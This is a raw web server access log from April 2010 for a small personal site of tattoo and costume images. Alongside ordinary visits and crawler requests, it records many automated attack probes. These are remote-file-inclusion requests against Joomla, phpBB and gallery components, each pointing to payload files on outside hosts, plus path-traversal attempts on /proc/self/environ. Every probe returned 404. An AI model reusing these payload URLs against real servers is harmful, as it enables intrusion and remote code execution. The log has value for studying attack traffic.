118.209.189.75 - - [26/Apr/2010:03:33:40 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:40 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:40 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:40 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:40 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:40 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:41 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:41 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:41 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:41 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:41 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:41 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
118.209.189.75 - - [26/Apr/2010:03:33:41 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
174.121.56.80 - - [26/Apr/2010:03:35:38 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.56.80 - - [26/Apr/2010:03:36:38 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.13.61.115 - - [26/Apr/2010:03:36:50 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.no/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=no&start=157&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%26start%3D140%26um%3D1%26hl%3Dno%26sa%3DN%26rlz%3D1T4SMSN_noNO356NO357%26ndsp%3D20%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB0.0; msn OptimizedIE8;NBNO; AskTB5.6)"
124.13.61.115 - - [26/Apr/2010:03:36:53 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://images.google.no/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=no&start=157&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%26start%3D140%26um%3D1%26hl%3Dno%26sa%3DN%26rlz%3D1T4SMSN_noNO356NO357%26ndsp%3D20%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; msn OptimizedIE8;NBNO; AskTB5.6)"
124.13.61.115 - - [26/Apr/2010:03:36:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; msn OptimizedIE8;NBNO; AskTB5.6)"
222.236.47.182 - - [26/Apr/2010:03:42:04 -0500] "GET /head.php?path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:42:04 -0500] "GET /logs/head.php?path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:42:09 -0500] "GET /logs/access_log.1219708800%20%20/head.php?path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:43:09 -0500] "GET /head.php?path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:43:09 -0500] "GET /logs/access_log.1219708800%20%20/head.php?path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:43:09 -0500] "GET /logs/head.php?path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.129.65.79 - - [26/Apr/2010:03:45:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
174.129.65.79 - - [26/Apr/2010:03:45:57 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
66.59.48.68 - - [26/Apr/2010:03:47:56 -0500] "GET /com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:03:47:56 -0500] "GET /logs/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:03:47:56 -0500] "GET /logs/access_log.1248652800/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:48:00 -0500] "GET /logs/blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:48:00 -0500] "GET /blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:48:00 -0500] "GET /logs/access_log.1264896000/blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:03:48:00 -0500] "GET /logs/access_log.1263427200/blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:10 -0500] "GET /blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:10 -0500] "GET /logs/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:10 -0500] "GET /logs/access_log.1266105600/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:10 -0500] "GET /blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:10 -0500] "GET /logs/access_log.1266105600/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:10 -0500] "GET /logs/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:30 -0500] "GET /logs/access_log.1264896000/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:30 -0500] "GET /logs/access_log.1263427200/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:30 -0500] "GET /logs/access_log.1264896000/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.141.53 - - [26/Apr/2010:03:48:30 -0500] "GET /logs/access_log.1263427200/blocks/block_site_map.php?root_folder_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.80.193.32 - - [26/Apr/2010:03:54:10 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
81.52.143.33 - - [26/Apr/2010:04:02:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.33 - - [26/Apr/2010:04:02:08 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
24.106.226.216 - - [26/Apr/2010:04:03:15 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://a.a.com/idx.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.831"
24.106.226.216 - - [26/Apr/2010:04:03:15 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://a.a.com/idx.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.831"
222.236.47.182 - - [26/Apr/2010:04:05:00 -0500] "GET /logs/blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:04:05:00 -0500] "GET /logs/access_log.1264896000/blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:04:05:00 -0500] "GET /logs/access_log.1263427200/blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:04:05:00 -0500] "GET /blocks/block_site_map.php?root_folder_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.92.94.85 - - [26/Apr/2010:04:05:32 -0500] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:04:05:32 -0500] "GET //vbgsitemap/vbgsitemap-config.php?base=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
85.141.89.188 - - [26/Apr/2010:04:05:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
66.249.71.36 - - [26/Apr/2010:04:06:53 -0500] "GET /costume/031_JPG%20copy.jpg HTTP/1.1" 200 44271 "-""Googlebot-Image/1.0"
193.107.48.3 - - [26/Apr/2010:04:10:27 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:10:27 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:10:27 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:10:32 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.186 - - [26/Apr/2010:04:10:42 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
81.176.226.186 - - [26/Apr/2010:04:10:42 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
207.46.204.194 - - [26/Apr/2010:04:11:27 -0500] "GET /logs/access_log.1208131200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.107.48.3 - - [26/Apr/2010:04:13:01 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:13:13 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.92.94.85 - - [26/Apr/2010:04:17:57 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:04:17:57 -0500] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:04:17:57 -0500] "GET /logs/access_log.1268611200//language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.813"
67.205.63.238 - - [26/Apr/2010:04:18:44 -0500] "GET /logs/access_log.1265760000//init_basic.php?GALLERY_BASEDIR=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.205.63.238 - - [26/Apr/2010:04:18:44 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.205.63.238 - - [26/Apr/2010:04:18:44 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
67.205.63.238 - - [26/Apr/2010:04:19:32 -0500] "GET /logs/access_log.1211068800//init_basic.php?GALLERY_BASEDIR=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
77.92.94.85 - - [26/Apr/2010:04:20:12 -0500] "GET /logs/access_log.1210291200//language/lang_german/lang_main_album.php?phpbb_root_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.813"
207.46.13.54 - - [26/Apr/2010:04:22:54 -0500] "GET /logs/access_log.1213142400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [26/Apr/2010:04:24:43 -0500] "GET //trans/trans.php?trans=ko&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:04:24:43 -0500] "GET /logs//trans/trans.php?trans=ko&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:04:24:43 -0500] "GET /logs/access_log.1270684800%20%20//trans/trans.php?trans=ko&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:04:25:08 -0500] "GET /logs/access_log.1270598400%20%20//trans/trans.php?trans=ko&page=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:26:11 -0500] "GET /logs/access_log.1220054400%20%20/index.php?option=com_letterman&task=subscribe&Itemid=34//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:26:11 -0500] "GET /logs/index.php?option=com_letterman&task=subscribe&Itemid=34//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:26:11 -0500] "GET /index.php?option=com_letterman&task=subscribe&Itemid=34//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:26:16 -0500] "GET /logs/access_log.1219708800%20%20/index.php?option=com_letterman&task=subscribe&Itemid=34//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:29:19 -0500] "GET /logs/access_log.1219708800/index.php?option=com_letterman&task=subscribe&Itemid=34//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:29:49 -0500] "GET /logs/access_log.1220054400/index.php?option=com_letterman&task=subscribe&Itemid=34//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:31:37 -0500] "GET ///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:31:37 -0500] "GET /logs/access_log.1270684800%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:31:37 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:31:37 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:31:39 -0500] "GET /logs///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:31:39 -0500] "GET /logs/access_log.1219708800///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:32:33 -0500] "GET /logs/access_log.1220054400///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:32:49 -0500] "GET ///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:32:50 -0500] "GET /logs///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:32:53 -0500] "GET /logs/access_log.1219708800///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:35:52 -0500] "GET ///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:35:54 -0500] "GET /logs///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:36:01 -0500] "GET /logs/access_log.1219708800///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:37:06 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:37:06 -0500] "GET /logs/access_log.1219622400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:37:06 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:04:37:17 -0500] "GET /logs/access_log.1220054400///components/com_letterman/letterman.php?mosConfig_absolute_path=http://www.neon-drive.com/drivers/Fx29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:38:15 -0500] "GET /logs/access_log.1270684800%20%20/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:38:15 -0500] "GET /forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:38:15 -0500] "GET /logs/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:04:39:15 -0500] "GET /logs/access_log.1215734400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
213.175.215.106 - - [26/Apr/2010:04:39:48 -0500] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
213.175.215.106 - - [26/Apr/2010:04:39:48 -0500] "GET //Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
213.175.215.106 - - [26/Apr/2010:04:40:06 -0500] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
213.175.215.106 - - [26/Apr/2010:04:40:07 -0500] "GET //Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
193.107.48.3 - - [26/Apr/2010:04:41:15 -0500] "GET /logs/access_log.1270684800//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
193.107.48.3 - - [26/Apr/2010:04:42:13 -0500] "GET /logs/access_log.1225238400//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.30.161.241 - - [26/Apr/2010:04:44:06 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [26/Apr/2010:04:44:07 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.41 - - [26/Apr/2010:04:44:25 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.205.63.238 - - [26/Apr/2010:04:48:42 -0500] "GET /logs/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.205.63.238 - - [26/Apr/2010:04:48:42 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
67.205.63.238 - - [26/Apr/2010:04:48:42 -0500] "GET /administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
